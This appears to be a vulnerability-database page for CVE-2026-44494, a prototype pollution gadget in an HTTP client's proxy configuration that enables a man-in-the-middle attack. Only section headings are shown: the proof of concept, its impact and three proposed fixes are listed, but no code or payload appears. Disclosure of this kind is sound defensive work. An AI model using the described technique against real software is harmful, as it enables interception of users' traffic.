Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-44494 (GCVE-0-2026-44494)

FKIE_CVE-2026-44494

GHSA-35JP-WW65-95WH

Vulnerability Disclosure: Full Man-in-the-Middle via Prototype Pollution Gadget in config.proxy

Summary

CWE

CVSS 3.1

Why This Bypasses mergeConfig

Usage of "Helper" Vulnerabilities

Proof of Concept

1. The Setup (Simulated Pollution)

2. The Gadget Trigger (Safe Code)

3. The Execution

4. The Impact (Full MITM)

5. Verified PoC Code

Verified PoC Output

Impact Analysis

Why This Is More Severe Than transformResponse (axios_26)

Recommended Fix

Fix 1: Use hasOwnProperty when reading security-sensitive config properties

Fix 2: Enumerate all properties not in defaults and apply hasOwnProperty

Fix 3: Use null-prototype object for merged config

Resources

Timeline

Tags

Sightings

Nomenclature

Vulnerability Disclosure: Full Man-in-the-Middle via Prototype Pollution Gadget in `config.proxy`

Fix 1: Use `hasOwnProperty` when reading security-sensitive config properties

Fix 2: Enumerate all properties not in defaults and apply `hasOwnProperty`